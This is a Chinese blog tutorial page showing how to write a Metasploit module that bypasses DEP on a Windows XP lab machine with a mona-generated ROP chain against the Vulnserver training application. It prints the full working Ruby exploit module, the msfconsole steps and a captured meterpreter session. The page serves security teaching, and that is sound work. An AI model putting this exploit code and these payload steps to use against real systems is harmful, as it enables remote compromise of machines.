<!DOCTYPE html>
<html lang="zh-CN">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <title>使用Metasploit编写绕过DEP渗透模块 | 冰河技术</title>
    <meta name="generator" content="VuePress 1.9.7">
    <link rel="icon" href="/favicon.ico">
    <script charset="utf-8" async="async" src="/js/jquery.min.js"></script>
    <script charset="utf-8" async="async" src="/js/global.js"></script>
    <script charset="utf-8" async="async" src="/js/fingerprint2.min.js"></script>
    <script charset="utf-8" async="async" src="https://v1.cnzz.com/z_stat.php?id=1281063564&amp;web_id=1281063564"></script>
    <script charset="utf-8" async="async" src="https://s9.cnzz.com/z_stat.php?id=1281064551&amp;web_id=1281064551"></script>
    <script>
            // Baidu Tongji analytics bootstrap. `_hmt` is the global command queue
            // that hm.js drains once it loads; it is created here if absent.
            var _hmt = _hmt || [];
            (function () {
              // Build the loader tag for the analytics script. The script is
              // fetched cross-origin with no `integrity` attribute, so the page
              // fully trusts whatever hm.baidu.com serves for this site id.
              var loaderTag = document.createElement("script");
              loaderTag.src = "https://hm.baidu.com/hm.js?d091d2fd0231588b1d0f9231e24e3f5e";
              // Insert ahead of the first <script> already in the document; a
              // dynamically inserted script is async by default, so parsing is
              // not blocked.
              var firstScript = document.getElementsByTagName("script").item(0);
              firstScript.parentNode.insertBefore(loaderTag, firstScript);
            })();
            </script>
    <meta name="description" content="包含：编程语言，开发技术，分布式，微服务，高并发，高可用，高可扩展，高可维护，JVM技术，MySQL，分布式数据库，分布式事务，云原生，大数据，云计算，渗透技术，各种面试题，面试技巧...">
    <meta property="article:modified_time" content="2022-05-23T11:30:51.000Z">
    <meta property="og:title" content="使用Metasploit编写绕过DEP渗透模块">
    <meta property="og:type" content="article">
    <meta property="og:url" content="/md/hack/tools/2022-04-17-025-%E4%BD%BF%E7%94%A8Metasploit%E7%BC%96%E5%86%99%E7%BB%95%E8%BF%87DEP%E6%B8%97%E9%80%8F%E6%A8%A1%E5%9D%97.html">
    <meta name="twitter:title" content="使用Metasploit编写绕过DEP渗透模块">
    <meta name="twitter:url" content="/md/hack/tools/2022-04-17-025-%E4%BD%BF%E7%94%A8Metasploit%E7%BC%96%E5%86%99%E7%BB%95%E8%BF%87DEP%E6%B8%97%E9%80%8F%E6%A8%A1%E5%9D%97.html">
    <meta name="twitter:card" content="summary_large_image">
    <meta name="robots" content="all">
    <meta name="author" content="冰河">
    <meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate">
    <meta http-equiv="Pragma" content="no-cache">
    <meta http-equiv="Expires" content="0">
    <meta name="keywords" content="冰河，冰河技术, 编程语言，开发技术，分布式，微服务，高并发，高可用，高可扩展，高可维护，JVM技术，MySQL，分布式数据库，分布式事务，云原生，大数据，云计算，渗透技术，各种面试题，面试技巧">
    <meta name="apple-mobile-web-app-capable" content="yes">
    
    <link rel="preload" href="/assets/css/0.styles.ab888ebb.css" as="style"><link rel="preload" href="/assets/css/styles.css?v=1653305936337" as="style"><link rel="preload" href="/assets/js/cg-styles.js?v=1653305936337" as="script"><link rel="preload" href="/assets/js/cg-app.js?v=1653305936337" as="script"><link rel="preload" href="/assets/js/cg-4.js?v=1653305936337" as="script"><link rel="preload" href="/assets/js/cg-3.js?v=1653305936337" as="script"><link rel="preload" href="/assets/js/cg-218.js?v=1653305936337" as="script"><link rel="preload" href="/assets/js/cg-5.js?v=1653305936337" as="script"><link rel="preload" href="/assets/js/cg-6.js?v=1653305936337" as="script">
    <link rel="stylesheet" href="/assets/css/0.styles.ab888ebb.css"><link rel="stylesheet" href="/assets/css/styles.css?v=1653305936337">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div class="theme-container"><header class="navbar"><div class="sidebar-button"><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" role="img" viewBox="0 0 448 512" class="icon"><path fill="currentColor" d="M436 124H12c-6.627 0-12-5.373-12-12V80c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12zm0 160H12c-6.627 0-12-5.373-12-12v-32c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12zm0 160H12c-6.627 0-12-5.373-12-12v-32c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12z"></path></svg></div> <a href="/" class="home-link router-link-active"><!----> <span class="site-name">冰河技术</span></a> <div class="links"><div class="search-box"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div> <nav class="nav-links can-hide"><div class="nav-item"><a href="/md/other/guide-to-reading.html" class="nav-link">
  <span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></div> <!----></nav></div></header> <div class="sidebar-mask"></div> <aside class="sidebar"><nav class="nav-links"><div class="nav-item"><a href="/md/other/guide-to-reading.html" class="nav-link">
  <span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></div> <!----></nav>  <ul class="sidebar-links"><li><section class="sidebar-group depth-0"><p class="sidebar-heading open"><span>渗透工具篇</span> <!----></p> <ul class="sidebar-links sidebar-group-items"><li><a href="/md/hack/tools/2022-04-17-001-使用Easy-Creds工具攻击无线网络.html" class="sidebar-link">使用Easy-Creds工具攻击无线网络</a></li><li><a href="/md/hack/tools/2022-04-17-002-Nmap+Zenmap+Amap+Zmap.html" class="sidebar-link">Nmap+Zenmap+Amap+Zmap</a></li><li><a href="/md/hack/tools/2022-04-17-003-Zenmap.html" class="sidebar-link">Zenmap</a></li><li><a href="/md/hack/tools/2022-04-17-004-Amap.html" class="sidebar-link">Amap</a></li><li><a href="/md/hack/tools/2022-04-17-005-Zmap.html" class="sidebar-link">Zmap</a></li><li><a href="/md/hack/tools/2022-04-17-006-Nessus的整理.html" class="sidebar-link">Nessus的整理</a></li><li><a href="/md/hack/tools/2022-04-17-007-Burpsuite上传截断及截断原理介绍.html" class="sidebar-link">Burpsuite上传截断及截断原理介绍</a></li><li><a href="/md/hack/tools/2022-04-17-008-Kali2.0Meterpreter运用.html" class="sidebar-link">Kali2.0 Meterpreter 运用</a></li><li><a href="/md/hack/tools/2022-04-17-009-lcx.exe内网转发命令教程-LCX免杀下载.html" class="sidebar-link">lcx.exe内网转发命令教程-LCX免杀下载</a></li><li><a href="/md/hack/tools/2022-04-17-010-字典生成工具Crunch的使用案例.html" class="sidebar-link">字典生成工具Crunch的使用案例</a></li><li><a href="/md/hack/tools/2022-04-17-011-WinlogonHack获取系统密码.html" class="sidebar-link">WinlogonHack获取系统密码</a></li><li><a 
href="/md/hack/tools/2022-05-02-017-Kali中一键更新Metasploit框架.html" class="sidebar-link">Kali中一键更新Metasploit框架</a></li><li><a href="/md/hack/tools/2022-05-02-018-Metasploit其他后渗透模块.html" class="sidebar-link">Metasploit其他后渗透模块</a></li><li><a href="/md/hack/tools/2022-05-02-019-Metasploit高级扩展功能.html" class="sidebar-link">Metasploit高级扩展功能</a></li><li><a href="/md/hack/tools/2022-05-02-020-Metasploit之pushm和popm命令.html" class="sidebar-link">Metasploit之pushm和popm命令</a></li><li><a href="/md/hack/tools/2022-05-02-021-Metasploit使用reload-edit-reload_all命令加快开发过程.html" class="sidebar-link">Metasploit使用reload、edit、reload_all命令加快开发过程</a></li><li><a href="/md/hack/tools/2022-05-02-022-Metasploit资源脚本的使用方法.html" class="sidebar-link">Metasploit资源脚本的使用方法</a></li><li><a href="/md/hack/tools/2022-05-02-023-在Metasploit中使用AutoRunScript.html" class="sidebar-link">在Metasploit中使用AutoRunScript</a></li><li><a href="/md/hack/tools/2022-05-02-024-使用Metasploit获取目标的控制权限.html" class="sidebar-link">使用Metasploit获取目标的控制权限</a></li><li><a href="/md/hack/tools/2022-05-02-025-使用Metasploit中的NMap插件扫描并渗透内网主机.html" class="sidebar-link">使用Metasploit中的NMap插件扫描并渗透内网主机</a></li><li><a href="/md/hack/tools/2022-05-02-026-Kali一句话升级Metasploit的命令.html" class="sidebar-link">Kali一句话升级Metasploit的命令</a></li><li><a href="/md/hack/tools/2022-05-02-027-Win2012R2打Windows8.1-KB2919355.html" class="sidebar-link">Win2012R2打Windows8.1-KB2919355</a></li><li><a href="/md/hack/tools/2022-05-02-028-Armitage基本原理.html" class="sidebar-link">Armitage基本原理</a></li><li><a href="/md/hack/tools/2022-05-02-029-Armitage网络扫描以及主机管理.html" class="sidebar-link">Armitage网络扫描以及主机管理</a></li><li><a href="/md/hack/tools/2022-05-02-030-使用Armitage进行渗透.html" class="sidebar-link">使用Armitage进行渗透</a></li><li><a href="/md/hack/tools/2022-05-02-031-使用Armitage进行后渗透攻击.html" class="sidebar-link">使用Armitage进行后渗透攻击</a></li><li><a href="/md/hack/tools/2022-05-02-032-使用Armitage进行客户端攻击.html" class="sidebar-link">使用Armitage进行客户端攻击</a></li><li><a 
href="/md/hack/tools/2022-05-02-033-Armitage脚本编写.html" class="sidebar-link">Armitage脚本编写</a></li><li><a href="/md/hack/tools/2022-05-02-034-Armitage控制Metasploit.html" class="sidebar-link">Armitage控制Metasploit</a></li><li><a href="/md/hack/tools/2022-05-02-035-Armitage使用Cortana实现后渗透攻击.html" class="sidebar-link">Armitage使用Cortana实现后渗透攻击</a></li><li><a href="/md/hack/tools/2022-05-02-036-Armitage使用Cortana创建自定义菜单.html" class="sidebar-link">Armitage使用Cortana创建自定义菜单</a></li><li><a href="/md/hack/tools/2022-05-02-037-Armitage界面的使用.html" class="sidebar-link">Armitage界面的使用</a></li><li><a href="/md/hack/tools/2022-05-02-038-tcpdump用法说明.html" class="sidebar-link">tcpdump用法说明</a></li></ul></section></li></ul> </aside> <div><main class="page"> <div class="theme-default-content content__default"><h1 id="使用metasploit编写绕过dep渗透模块"><a href="#使用metasploit编写绕过dep渗透模块" class="header-anchor">#</a> 使用Metasploit编写绕过DEP渗透模块</h1> <p>攻击机 Kali 192.168.109.137</p> <p>靶机 WinXP 192.168.109.141 (也可为其他Win系统，设置为DEP保护)</p> <p>应用程序 Vulnserver(可以到链接： https://download.csdn.net/download/l1028386804/10921905 下载)</p> <h2 id="将靶机设置dep保护"><a href="#将靶机设置dep保护" class="header-anchor">#</a> 将靶机设置DEP保护</h2> <p><strong>数据执行保护（Data Execution Prevention，DEP）</strong>是一种将特定内存区域标记为不可执行的保护机制，这种机制会导致我们在渗透过程中无法执行ShellCode。因此，即使我们可以改写EIP寄存器中的内容并成功地将ESP指向了ShellCode的起始地址，也无法执行攻击载荷。这是因为DEP的存在阻止了内存中可写区域（例如栈和堆）中数据的执行。在这种情况下，我们必须使用可执行区域中的现存指令实现预期的功能——可以通过把可执行区域中的现存指令按一定顺序串联起来，使执行流最终跳到ShellCode来实现这一目的。</p> <p>绕过DEP的技术被称为返回导向编程（Return Oriented Programming，ROP）技术，它不同于通过覆盖改写EIP内容并跳转到ShellCode的普通栈溢出方法。当DEP启用之后，我们将无法使用这种普通方法，因为栈中的数据是不能执行的。因此我们不再跳转到ShellCode，而是调用第一个ROP指令片段（gadget）。这些指令片段共同构成一个链式结构，一个指令片段会返回下一个指令片段，而不执行栈中的任何代码。</p> <p>具体操作如下：</p> <p>右键&quot;我的电脑&quot;-&gt;属性-&gt;高级-&gt;性能设置-&gt;数据执行保护-&gt;选择“为除下列选定程序之外的所有程序和服务启用DEP (U)”-&gt;确定</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190117125342351.png" loading="lazy" class="lazy"></p> <h2 id="开启vlunserver监听"><a href="#开启vlunserver监听" class="header-anchor">#</a> 开启Vulnserver监听</h2> 
<p>在靶机的命令行中切换到vulnserver.exe所在的目录，执行如下命令</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>vlunserver.exe 9999
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>监听9999端口</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190117125430253.png" loading="lazy" class="lazy"></p> <h2 id="开启immunitydebugger"><a href="#开启immunitydebugger" class="header-anchor">#</a> 开启ImmunityDebugger</h2> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190117125458129.png" loading="lazy" class="lazy"></p> <h2 id="将vulnserver进程加载到immunitydebugger"><a href="#将vulnserver进程加载到immunitydebugger" class="header-anchor">#</a> 将Vulnserver进程加载到ImmunityDebugger</h2> <p>依次选择ImmunityDebugger的File-&gt;Attach</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190117125523794.png" loading="lazy" class="lazy"></p> <p>显示靶机所有进程的信息</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190117125536289.png" loading="lazy" class="lazy"></p> <p>我们选中Vulnserver进程并单击右下角的Attach按钮</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190117125551775.png" loading="lazy" class="lazy"></p> <p>显示Vulnserver进程的运行信息</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190117125607172.png" loading="lazy" class="lazy"></p> <p>此时看到Vulnserver进程处于暂停状态，我们需要点击ImmunityDebugger的Play按钮</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190117125620946.png" loading="lazy" class="lazy"></p> <p>此时，看到Vulnserver处于运行状态</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190117125639410.png" loading="lazy" class="lazy"></p> <h2 id="查找vulnserver运行时加载的所有dll信息"><a href="#查找vulnserver运行时加载的所有dll信息" class="header-anchor">#</a> 查找Vulnserver运行时加载的所有DLL信息</h2> <p>在ImmunityDebugger的命令行输入如下命令：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>!mona modules
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190117125708628.png" loading="lazy" class="lazy"></p> <h2 id="将msvcrt-dll上传到kali的-root目录下"><a href="#将msvcrt-dll上传到kali的-root目录下" class="header-anchor">#</a> 将msvcrt.dll上传到Kali的/root目录下</h2> <p>这里我们将靶机的C:\Windows\system32\msvcrt.dll上传到Kali的/root目录下。</p> <h2 id="查找rop指令片段"><a href="#查找rop指令片段" class="header-anchor">#</a> 查找ROP指令片段</h2> <p>这里，我们使用到的工具是Metasploit的msfrop，在Kali的命令行输入：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>msfconsole
msfrop -v -s &quot;pop cex&quot; /root/msvcrt.dll
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>输出太多，这里只截取一部分：</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190117125804744.png" loading="lazy" class="lazy"></p> <h2 id="创建rop链"><a href="#创建rop链" class="header-anchor">#</a> 创建ROP链</h2> <p>在ImmunityDebugger命令行输入如下命令：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>!mona rop -m *.dll -cp nonull
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190117125843386.png" loading="lazy" class="lazy"></p> <p>执行后会在ImmunityDebugger安装目录下生成一个rop_chains.txt文件</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190117125857534.png" loading="lazy" class="lazy"></p> <p>我们打开rop_chains.txt文件，找到如下代码片段：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>def create_rop_chain()

  # rop chain generated with mona.py - www.corelan.be
  rop_gadgets = 
  [
    0x77bfc038,  # POP ECX # RETN [msvcrt.dll] 
    0x6250609c,  # ptr to &amp;VirtualProtect() [IAT essfunc.dll]
    0x77d5373d,  # MOV EAX,DWORD PTR DS:[ECX] # RETN [USER32.dll] 
    0x7c96d192,  # XCHG EAX,ESI # RETN [ntdll.dll] 
    0x77c11c54,  # POP EBP # RETN [msvcrt.dll] 
    0x625011bb,  # &amp; jmp esp [essfunc.dll]
    0x77c04fcd,  # POP EAX # RETN [msvcrt.dll] 
    0xfffffdff,  # Value to negate, will become 0x00000201
    0x77e6d222,  # NEG EAX # RETN [RPCRT4.dll] 
    0x77dc560a,  # XCHG EAX,EBX # RETN [ADVAPI32.dll] 
    0x77f01564,  # POP EAX # RETN [GDI32.dll] 
    0xffffffc0,  # Value to negate, will become 0x00000040
    0x77e6d222,  # NEG EAX # RETN [RPCRT4.dll] 
    0x77ef24c8,  # XCHG EAX,EDX # RETN [GDI32.dll] 
    0x77c0eb4f,  # POP ECX # RETN [msvcrt.dll] 
    0x7c99f17e,  # &amp;Writable location [ntdll.dll]
    0x77c17641,  # POP EDI # RETN [msvcrt.dll] 
    0x77e6d224,  # RETN (ROP NOP) [RPCRT4.dll]
    0x77c04fcd,  # POP EAX # RETN [msvcrt.dll] 
    0x90909090,  # nop
    0x60fe4479,  # PUSHAD # RETN [hnetcfg.dll] 
  ].flatten.pack(&quot;V*&quot;)

  return rop_gadgets

end
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br><span class="line-number">24</span><br><span class="line-number">25</span><br><span class="line-number">26</span><br><span class="line-number">27</span><br><span class="line-number">28</span><br><span class="line-number">29</span><br><span class="line-number">30</span><br><span class="line-number">31</span><br></div></div><p><img alt="img" data-src="https://img-blog.csdnimg.cn/2019011712593726.png" loading="lazy" class="lazy"></p> <p>之后，将这段代码拷贝到我们自己编写的渗透模块中。</p> <h2 id="编写绕过dep的metasploit模块脚本dep-attack-by-binghe-rb"><a href="#编写绕过dep的metasploit模块脚本dep-attack-by-binghe-rb" class="header-anchor">#</a> 编写绕过DEP的Metasploit模块脚本dep_attack_by_binghe.rb</h2> <p>不多说，直接上代码：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>##
# Author 冰河
# Date 2019-01-16
# Description Metasploit绕过DEP
##

# Legacy bootstrap line: newer framework versions load the core library
# themselves and modules omit this require.
require 'msf/core'
# Remote exploit module for the vulnserver TRUN overflow with DEP enabled.
# The class name Metasploit3 is the legacy module layout; current framework
# modules are declared as MetasploitModule.
class Metasploit3 &lt; Msf::Exploit::Remote
  Rank = NormalRanking
  
  # Supplies connect / sock / disconnect and the RHOST / RPORT options.
  include Msf::Exploit::Remote::Tcp
  
  # Module metadata: name, payload constraints, target table and options.
  def initialize(info = {})
    super(update_info(info,
      'Name'           =&gt; 'DEP Bypass Exploit',
      'Description'    =&gt; %q{
        DEP Bypass Using ROP Chains Example Module
      },
      'Platform'       =&gt; 'Windows',
      'Author'         =&gt; ['binghe'],
      'Payload'        =&gt;
        {
          # Payload size limit and the single byte the encoder must avoid;
          # NUL is excluded here, presumably because it would cut the string
          # short inside the server -- not verified on this page.
          'space'     =&gt; 312,
          'BadChars'  =&gt; &quot;\x00&quot;
        },
       'Targets'      =&gt; 
        [
          # 'Offset' is the filler length used by exploit below; presumably
          # the distance to the saved return address on this build of
          # vulnserver -- confirm against the crash analysis, it is not
          # derived anywhere in this module.
          ['Windows XP', {'Offset'  =&gt; 2006}]
        ],
        'DisclosureDate'  =&gt; '2019-01-16'))
     
     # Default RPORT is vulnserver's listening port; passing self.class is
     # the legacy two-argument form of register_options.
     register_options(
      [
        Opt::RPORT(9999)
      ],self.class)
  end
  
   # Returns the ROP chain as a byte string (mona.py output pasted verbatim).
   # Every entry is a fixed absolute address inside a loaded module, so the
   # chain only works where those images load at the same base every time;
   # randomising module bases (ASLR) breaks every gadget here, which is why
   # DEP is meant to be deployed together with ASLR rather than on its own.
   # The chain stages a VirtualProtect call: the second entry is the IAT
   # pointer, the two NEG EAX gadgets produce the size 0x201 and the new
   # protection 0x40 (PAGE_EXECUTE_READWRITE), and PUSHAD pushes the prepared
   # registers so they land as the call's arguments.
   def create_rop_chain()

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = 
    [
      0x77bfc038,  # POP ECX # RETN [msvcrt.dll] 
      0x6250609c,  # ptr to &amp;VirtualProtect() [IAT essfunc.dll]
      0x77d5373d,  # MOV EAX,DWORD PTR DS:[ECX] # RETN [USER32.dll] 
      0x7c96d192,  # XCHG EAX,ESI # RETN [ntdll.dll] 
      0x77c11c54,  # POP EBP # RETN [msvcrt.dll] 
      0x625011bb,  # &amp; jmp esp [essfunc.dll]
      0x77c04fcd,  # POP EAX # RETN [msvcrt.dll] 
      0xfffffdff,  # Value to negate, will become 0x00000201
      0x77e6d222,  # NEG EAX # RETN [RPCRT4.dll] 
      0x77dc560a,  # XCHG EAX,EBX # RETN [ADVAPI32.dll] 
      0x77f01564,  # POP EAX # RETN [GDI32.dll] 
      0xffffffc0,  # Value to negate, will become 0x00000040
      0x77e6d222,  # NEG EAX # RETN [RPCRT4.dll] 
      0x77ef24c8,  # XCHG EAX,EDX # RETN [GDI32.dll] 
      0x77c0eb4f,  # POP ECX # RETN [msvcrt.dll] 
      0x7c99f17e,  # &amp;Writable location [ntdll.dll]
      0x77c17641,  # POP EDI # RETN [msvcrt.dll] 
      0x77e6d224,  # RETN (ROP NOP) [RPCRT4.dll]
      0x77c04fcd,  # POP EAX # RETN [msvcrt.dll] 
      0x90909090,  # nop
      0x60fe4479,  # PUSHAD # RETN [hnetcfg.dll] 
    ].flatten.pack(&quot;V*&quot;)  # each address as a 32-bit little-endian value

    return rop_gadgets

  end
  
  # Single TCP exchange: TRUN command, target['Offset'] bytes of filler, the
  # ROP chain, a 16-byte NOP sled and the encoded payload; handler then runs
  # the payload handler (bind_tcp in the walkthrough). From the defender's
  # side the oversized TRUN argument -- roughly 2 KB of uppercase filler
  # followed by binary addresses -- is the on-the-wire observable.
  def exploit
    connect
    rop_chain = create_rop_chain()
    # Uppercase-alpha filler of target['Offset'] bytes.
    junk = rand_text_alpha_upper(target['Offset'])
    buf = &quot;TRUN .&quot; + junk + rop_chain + make_nops(16) + payload.encoded + '\r\n'
    sock.put(buf)
    handler
    disconnect
  end
  
end
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br><span class="line-number">24</span><br><span class="line-number">25</span><br><span class="line-number">26</span><br><span class="line-number">27</span><br><span class="line-number">28</span><br><span class="line-number">29</span><br><span class="line-number">30</span><br><span class="line-number">31</span><br><span class="line-number">32</span><br><span class="line-number">33</span><br><span class="line-number">34</span><br><span class="line-number">35</span><br><span class="line-number">36</span><br><span class="line-number">37</span><br><span class="line-number">38</span><br><span class="line-number">39</span><br><span class="line-number">40</span><br><span class="line-number">41</span><br><span class="line-number">42</span><br><span class="line-number">43</span><br><span class="line-number">44</span><br><span class="line-number">45</span><br><span class="line-number">46</span><br><span class="line-number">47</span><br><span class="line-number">48</span><br><span class="line-number">49</span><br><span class="line-number">50</span><br><span 
class="line-number">51</span><br><span class="line-number">52</span><br><span class="line-number">53</span><br><span class="line-number">54</span><br><span class="line-number">55</span><br><span class="line-number">56</span><br><span class="line-number">57</span><br><span class="line-number">58</span><br><span class="line-number">59</span><br><span class="line-number">60</span><br><span class="line-number">61</span><br><span class="line-number">62</span><br><span class="line-number">63</span><br><span class="line-number">64</span><br><span class="line-number">65</span><br><span class="line-number">66</span><br><span class="line-number">67</span><br><span class="line-number">68</span><br><span class="line-number">69</span><br><span class="line-number">70</span><br><span class="line-number">71</span><br><span class="line-number">72</span><br><span class="line-number">73</span><br><span class="line-number">74</span><br><span class="line-number">75</span><br><span class="line-number">76</span><br><span class="line-number">77</span><br><span class="line-number">78</span><br><span class="line-number">79</span><br><span class="line-number">80</span><br></div></div><p>其中，create_rop_chain()方法就是从第8步（创建ROP链）生成的rop_chains.txt文件中复制来的。</p> <h2 id="上传脚本dep-attack-by-binghe-rb"><a href="#上传脚本dep-attack-by-binghe-rb" class="header-anchor">#</a> 上传脚本dep_attack_by_binghe.rb</h2> <p>将脚本dep_attack_by_binghe.rb上传到Kali的/usr/share/metasploit-framework/modules/exploits/windows/masteringmetasploit目录下。</p> <h2 id="关闭immunitydebugger重新启动vulnserver"><a href="#关闭immunitydebugger重新启动vulnserver" class="header-anchor">#</a> 关闭ImmunityDebugger重新启动Vulnserver</h2> <p>在靶机上关闭ImmunityDebugger并重新启动Vulnserver。</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190117130049549.png" loading="lazy" class="lazy"></p> <h2 id="在kali上执行"><a href="#在kali上执行" class="header-anchor">#</a> 在Kali上执行</h2> <div class="language- line-numbers-mode"><pre class="language-text"><code>msfconsole
use exploit/windows/masteringmetasploit/dep_attack_by_binghe 
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.109.141
show options
exploit
ifconfig
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><p>具体操作如下：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>msf &gt; use exploit/windows/masteringmetasploit/dep_attack_by_binghe 
msf exploit(windows/masteringmetasploit/dep_attack_by_binghe) &gt; set payload windows/meterpreter/bind_tcp
payload =&gt; windows/meterpreter/bind_tcp
msf exploit(windows/masteringmetasploit/dep_attack_by_binghe) &gt; set RHOST 192.168.109.141
RHOST =&gt; 192.168.109.141
msf exploit(windows/masteringmetasploit/dep_attack_by_binghe) &gt; show options

Module options (exploit/windows/masteringmetasploit/dep_attack_by_binghe):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.109.141  yes       The target address
   RPORT  9999             yes       The target port (TCP)


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     192.168.109.141  no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows XP


msf exploit(windows/masteringmetasploit/dep_attack_by_binghe) &gt; exploit

[*] Started bind TCP handler against 192.168.109.141:4444
[*] Sending stage (179779 bytes) to 192.168.109.141

meterpreter &gt; ifconfig

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1


Interface 65539
============
Name         : VMware Accelerated AMD PCNet Adapter
Hardware MAC : 00:0c:29:5d:8e:d4
MTU          : 1500
IPv4 Address : 192.168.109.141
IPv4 Netmask : 255.255.255.0


Interface 65540
============
Name         : Bluetooth �)%
Hardware MAC : 3c:a0:67:1a:fe:b4
MTU          : 1500

meterpreter &gt; 
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br><span class="line-number">24</span><br><span class="line-number">25</span><br><span class="line-number">26</span><br><span class="line-number">27</span><br><span class="line-number">28</span><br><span class="line-number">29</span><br><span class="line-number">30</span><br><span class="line-number">31</span><br><span class="line-number">32</span><br><span class="line-number">33</span><br><span class="line-number">34</span><br><span class="line-number">35</span><br><span class="line-number">36</span><br><span class="line-number">37</span><br><span class="line-number">38</span><br><span class="line-number">39</span><br><span class="line-number">40</span><br><span class="line-number">41</span><br><span class="line-number">42</span><br><span class="line-number">43</span><br><span class="line-number">44</span><br><span class="line-number">45</span><br><span class="line-number">46</span><br><span 